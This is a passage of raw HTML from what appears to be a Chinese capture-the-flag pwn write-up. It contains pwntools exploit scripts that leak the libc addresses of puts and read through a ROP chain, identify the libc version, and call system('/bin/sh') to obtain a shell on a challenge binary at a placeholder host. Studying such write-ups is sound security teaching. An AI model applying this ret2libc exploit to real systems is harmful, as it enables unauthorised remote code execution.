<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">puts_real <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">u64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">recvuntil<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #EBCB8B\">\\x7f<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">)&#91;<\/span><span style=\"color: #81A1C1\">-<\/span><span style=\"color: #B48EAD\">6<\/span><span style=\"color: #ECEFF4\">:&#93;.<\/span><span style=\"color: #88C0D0\">ljust<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">8<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #EBCB8B\">\\x00<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">))<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #88C0D0\">print<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">&#91;+&#93; The real address of puts is<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">hex<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">puts_real<\/span><span style=\"color: #ECEFF4\">))<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">libc <\/span><span style=\"color: #81A1C1\">=<\/span><span 
style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">LibcSearcher<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">puts<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> puts_real<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">libc_base <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> puts_real <\/span><span style=\"color: #81A1C1\">-<\/span><span style=\"color: #D8DEE9FF\"> libc<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">dump<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">puts<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #88C0D0\">print<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">&#91;+&#93; The base address of libc is<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">hex<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">libc_base<\/span><span style=\"color: #ECEFF4\">))<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">system <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> libc_base <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> libc<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">dump<\/span><span 
style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">system<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">sh <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> libc_base <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> libc<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">dump<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">str_bin_sh<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">a<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">*<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">20<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">=Triode=<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">pop_rdi<\/span><span style=\"color: 
#ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">sh<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">system<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">vuln<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">sendlineafter<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">Pull up your sword and tell me u story!<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> payload<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">interactive<\/span><span style=\"color: 
#ECEFF4\">()<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>\u591a\u6b21\u5c1d\u8bd5\u4e4b\u540e\u53ef\u4ee5\u53d1\u73b0\u6b63\u786e\u7684\u7248\u672c\u4e3a<code>libc6_2.23-0ubuntu10_amd64<\/code>\uff0c\u5728\u8fdb\u884c\u5982\u4e0b\u4ea4\u4e92\u4e4b\u540e\u6211\u4eec\u5c31\u53ef\u4ee5\u83b7\u5f97shell\u4e86\uff1a<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-21.png\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-21.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"489\" height=\"329\" data-original=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-21.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-154\"  sizes=\"auto, (max-width: 489px) 100vw, 489px\" \/><\/div><\/a><\/figure>\n<\/div>\n\n\n<h5 class=\"wp-block-heading\">\u901a\u8fc7<a href=\"https:\/\/libc.rip\/\">libc-database<\/a>\u786e\u5b9alibc\u7248\u672c<\/h5>\n\n\n\n<p>\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7\u5982\u4e0b\u4ee3\u7801\u6765\u8f93\u51fa<code>puts<\/code>\u548c<code>read<\/code>\u7684\u771f\u5b9e\u5730\u5740\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 
16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>from pwn import *  \n\np = remote(\"ip\", port)  \nelf = ELF(\".\/pwn\")  \n\nputs_plt = elf.plt&#91;'puts'&#93;  \nputs_got = elf.got&#91;'puts'&#93;  \nread_got = elf.got&#91;'read'&#93;  \npop_rdi = 0x400733  \nret = 0x4004c9  \nvuln = 0x40067D  \n\npayload = b'a' * 0x20 + b'=Triode=' + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(vuln)  \n\np.sendlineafter(b\"Pull up your sword and tell me u story!\", payload)  \n\nputs_real = u64(p.recvuntil(b'\\x7f')&#91;-6:&#93;.ljust(8, b'\\x00'))  \nprint(\"&#91;+&#93; The real address of puts is\", hex(puts_real))  \n\npayload = b'a' * 0x20 + b'=Triode=' + p64(pop_rdi) + p64(read_got) + p64(puts_plt) + p64(vuln)  \n\np.sendlineafter(b\"Pull up your sword and tell me u story!\", payload)  \n\nread_real = u64(p.recvuntil(b'\\x7f')&#91;-6:&#93;.ljust(8, b'\\x00'))  \nprint(\"&#91;+&#93; The real address of read is\", hex(read_real))<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" 
stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #81A1C1\">from<\/span><span style=\"color: #D8DEE9FF\"> pwn <\/span><span style=\"color: #81A1C1\">import<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">*<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">remote<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">ip<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> port<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">elf <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">ELF<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">.\/pwn<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">puts_plt <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> 
elf<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #D8DEE9FF\">plt<\/span><span style=\"color: #ECEFF4\">&#91;<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">puts<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">&#93;<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">puts_got <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> elf<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #D8DEE9FF\">got<\/span><span style=\"color: #ECEFF4\">&#91;<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">puts<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">&#93;<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">read_got <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> elf<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #D8DEE9FF\">got<\/span><span style=\"color: #ECEFF4\">&#91;<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">read<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">&#93;<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">pop_rdi <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">400733<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">ret <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">4004c9<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span 
style=\"color: #D8DEE9FF\">vuln <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">40067D<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">a<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">*<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">20<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">=Triode=<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">pop_rdi<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">puts_got<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">puts_plt<\/span><span style=\"color: 
#ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">vuln<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">sendlineafter<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">Pull up your sword and tell me u story!<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> payload<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">puts_real <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">u64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">recvuntil<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #EBCB8B\">\\x7f<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">)&#91;<\/span><span style=\"color: #81A1C1\">-<\/span><span style=\"color: #B48EAD\">6<\/span><span style=\"color: #ECEFF4\">:&#93;.<\/span><span style=\"color: #88C0D0\">ljust<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">8<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: 
#81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #EBCB8B\">\\x00<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">))<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #88C0D0\">print<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">&#91;+&#93; The real address of puts is<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">hex<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">puts_real<\/span><span style=\"color: #ECEFF4\">))<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">a<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">*<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">20<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">=Triode=<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">pop_rdi<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: 
#D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">read_got<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">puts_plt<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">vuln<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">sendlineafter<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">Pull up your sword and tell me u story!<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> payload<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">read_real <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">u64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">recvuntil<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: 
#81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #EBCB8B\">\\x7f<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">)&#91;<\/span><span style=\"color: #81A1C1\">-<\/span><span style=\"color: #B48EAD\">6<\/span><span style=\"color: #ECEFF4\">:&#93;.<\/span><span style=\"color: #88C0D0\">ljust<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">8<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #EBCB8B\">\\x00<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">))<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #88C0D0\">print<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">&#91;+&#93; The real address of read is<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">hex<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">read_real<\/span><span style=\"color: #ECEFF4\">))<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>\u5f97\u5230\uff1a<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-22.png\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-22.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"378\" height=\"46\" 
